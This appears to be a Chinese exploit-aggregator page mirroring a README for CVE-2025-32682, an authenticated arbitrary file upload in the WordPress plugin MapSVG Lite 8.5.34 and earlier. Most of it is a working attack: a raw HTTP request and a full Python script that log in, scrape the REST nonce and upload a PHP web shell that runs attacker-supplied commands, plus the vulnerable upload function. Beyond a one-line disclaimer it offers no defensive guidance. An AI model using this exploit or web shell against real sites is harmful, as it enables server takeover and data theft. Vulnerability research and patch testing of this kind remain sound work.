关联漏洞
标题:
WordPress plugin MapSVG Lite 代码问题漏洞
(CVE-2025-32682)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin MapSVG Lite 8.5.34及之前版本存在代码问题漏洞,该漏洞源于允许上传危险类型文件,可能导致上传Web脚本到服务器。
描述
WordPress MapSVG Lite Plugin <= 8.5.34 is vulnerable to Arbitrary File Upload
介绍
# 🐚 CVE-2025-32682 - Arbitrary File Upload in MapSVG Lite <= 8.5.34
## 📌 Plugin Details
- **Name:** MapSVG Lite
- **Affected Version:** <= 8.5.34
- **Vulnerability Type:** Arbitrary File Upload
- **CVE ID:** CVE-2025-32682
- **Published Date:** 15 April, 2025
- **CVSS Score:** 9.9 (Critical)
---
## 💥 Vulnerability Summary
The `MapSVG Lite` plugin for WordPress does not validate file types when uploading SVG files via its REST API endpoint:
```
/wp-json/mapsvg/v1/svgfile
```
This allows an authenticated attacker (Subscriber+) to upload arbitrary PHP files disguised as SVG, resulting in remote code execution (RCE).
---
## 📎 Proof of Concept (POC) - Raw HTTP Request
```http
POST /wp-json/mapsvg/v1/svgfile HTTP/1.1
Host: 192.168.100.74:888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://target.com/wp-admin/admin.php?page=mapsvg-config
X-WP-Nonce: 4febb3ff50
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------155355665422604566641836454807
Content-Length: 298
Origin: http://192.168.100.74:888
Connection: keep-alive
Cookie:
-----------------------------155355665422604566641836454807
Content-Disposition: form-data; name="file"; filename="nxploit.php"
Content-Type: text/xml
<!--?php
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?-->
-----------------------------155355665422604566641836454807--
```
### 🔍 Vulnerable Code Snippet
The following vulnerable code snippet from the `mapsvg-lite-interactive-vector-maps.php` file highlights the issue:
```php
public function uploadSVG() {
$file = $_FILES['file'];
$upload = wp_upload_bits($file['name'], null, file_get_contents($file['tmp_name']));
return new \WP_REST_Response(["file" => $upload], 200);
}
```
- ❌ **No filetype check**
- ❌ **No extension validation**
- ❌ **No sanitization of file contents**
This function is directly mapped to the REST endpoint `/wp-json/mapsvg/v1/svgfile`.
---
## 🧠 Exploitation Requirements
- ✅ Requires authentication (Subscriber+)
- 🛑 No filetype or content validation
---
## 🐍 POC 2 - Python Exploit Script
```python
# By: Nxploited | Khaled Alenazi
import requests
import argparse
import re
requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True)
parser.add_argument("-un", "--username", required=True)
parser.add_argument("-p", "--password", required=True)
args = parser.parse_args()
login_url = f"{args.url}/wp-login.php"
resp = session.post(login_url, data={
'log': args.username,
'pwd': args.password,
'rememberme': 'forever',
'wp-submit': 'Log In'
}, headers={"User-Agent": user_agent})
if 'wordpress_logged_in' not in str(session.cookies):
print("[-] Login failed")
exit()
print("[+] Logged in successfully.")
nonce_page = session.get(f"{args.url}/wp-admin/admin.php?page=mapsvg-config")
match = re.search(r'"nonce":"([a-f0-9]+)"', nonce_page.text)
if not match:
print("[-] Failed to extract nonce")
exit()
nonce = match.group(1)
print(f"[+] Found nonce: {nonce}")
upload_url = f"{args.url}/wp-json/mapsvg/v1/svgfile"
print(f"[+] Uploading file to: {upload_url}")
payload = {'file': ('nxploit.php', '<?php if(isset($_GET[\'cmd\'])){ system($_GET[\'cmd\']); } ?>', 'application/x-php')}
headers = {
'X-WP-Nonce': nonce,
'Referer': f"{args.url}/wp-admin/admin.php?page=mapsvg-config",
'X-Requested-With': 'XMLHttpRequest',
'User-Agent': user_agent
}
res = session.post(upload_url, files=payload, headers=headers)
try:
json_res = res.json()
print("[+] Server response (formatted):")
print("File Name :", json_res['file']['name'])
print("URL :", json_res['file']['relativeUrl'])
print("Path Short :", json_res['file']['pathShort'])
print("Server Path :", json_res['file']['serverPath'])
print("\nExploited By : Nxploited | Khaled Alenazi")
except:
print("[-] Upload failed or invalid response.")
```
---
## ☠️ Impact
Exploitation of this vulnerability allows an attacker to upload a `.php` web shell to the `/wp-content/uploads/mapsvg/` directory and execute arbitrary commands on the server.
---
## 👤 By:
**Nxploited | Khaled Alenazi**
---
## ⚠️ Disclaimer
This project is for **educational purposes only**. Unauthorized access to systems without permission is illegal.
文件快照
[4.0K] /data/pocs/7ea9ec8511b6e742d8908136675a919be084ef12
└── [4.6K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。